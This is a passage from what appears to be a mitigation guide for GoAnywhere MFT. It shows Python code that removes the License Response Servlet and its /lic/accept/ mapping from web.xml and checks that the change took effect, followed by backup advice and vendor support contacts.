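  </servlet>
  <servlet>
    <servlet-name>License Response Servlet</servlet-name>
    <servlet-class>com.linoma.ga.ui.admin.servlet.LicenseResponseServlet</servlet-class>
    <load-on-startup>0</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>Other Servlet</servlet-name>
    <url-pattern>/other/</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>Licenses Response Servlet</servlet-name>
    <url-pattern>/lic/accept/</url-pattern>
  </servlet-mapping>
</web-app>
"""


def _local_name(tag):
    """Strip a '{namespace}' prefix so matching works with or without an xmlns."""
    return tag.rsplit("}", 1)[-1]


def _child_text(element, name):
    for child in element:
        if _local_name(child.tag) == name:
            return (child.text or "").strip()
    return None


def _register_default_namespace(root):
    # Keep the serialized file free of ns0: prefixes by re-registering the
    # document's own default namespace, if it has one.
    if root.tag.startswith("{"):
        ET.register_namespace("", root.tag[1:].split("}", 1)[0])


def is_mitigated(xml_text):
    """True when no License Response Servlet definition and no /lic/accept/ mapping remain."""
    root = ET.fromstring(xml_text)
    for child in root:
        name = _local_name(child.tag)
        if name == "servlet" and _child_text(child, "servlet-class") == LICENSE_SERVLET_CLASS:
            return False
        if name == "servlet-mapping" and _child_text(child, "url-pattern") == LICENSE_URL_PATTERN:
            return False
    return True


def remove_license_servlet(xml_text):
    """Return (new_xml_text, removed) where removed lists the dropped elements."""
    root = ET.fromstring(xml_text)
    _register_default_namespace(root)
    removed = []
    servlet_names = set()
    # Pass 1: the servlet definition, matched on its class.
    for child in list(root):
        if _local_name(child.tag) == "servlet" and \
                _child_text(child, "servlet-class") == LICENSE_SERVLET_CLASS:
            servlet_names.add(_child_text(child, "servlet-name"))
            root.remove(child)
            removed.append(("servlet", _child_text(child, "servlet-name")))
    # Pass 2: any mapping for the URL pattern, or for the removed servlet's name.
    for child in list(root):
        if _local_name(child.tag) != "servlet-mapping":
            continue
        if _child_text(child, "url-pattern") == LICENSE_URL_PATTERN or \
                _child_text(child, "servlet-name") in servlet_names:
            root.remove(child)
            removed.append(("servlet-mapping", _child_text(child, "url-pattern")))
    body = ET.tostring(root, encoding="unicode")
    return '<?xml version="1.0" encoding="UTF-8"?>\n' + body + "\n", removed


if __name__ == "__main__":
    new_xml, dropped = remove_license_servlet(SAMPLE_WEB_XML)
    print("removed:", dropped, "| mitigated:", is_mitigated(new_xml))
```

ElementTree drops XML comments when it re-serializes, so this removes the elements outright (the advisory allows deletion as an alternative to commenting out); take a backup of web.xml first, and use `is_mitigated()` on the live file of each node as the post-change check before restarting the application.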

If you have questions, our support team is here to help. Please contact Support via the portal https://my.goanywhere.com/, email goanywhere.support@helpsystems.com, or phone 402-944-4242 for assistance.
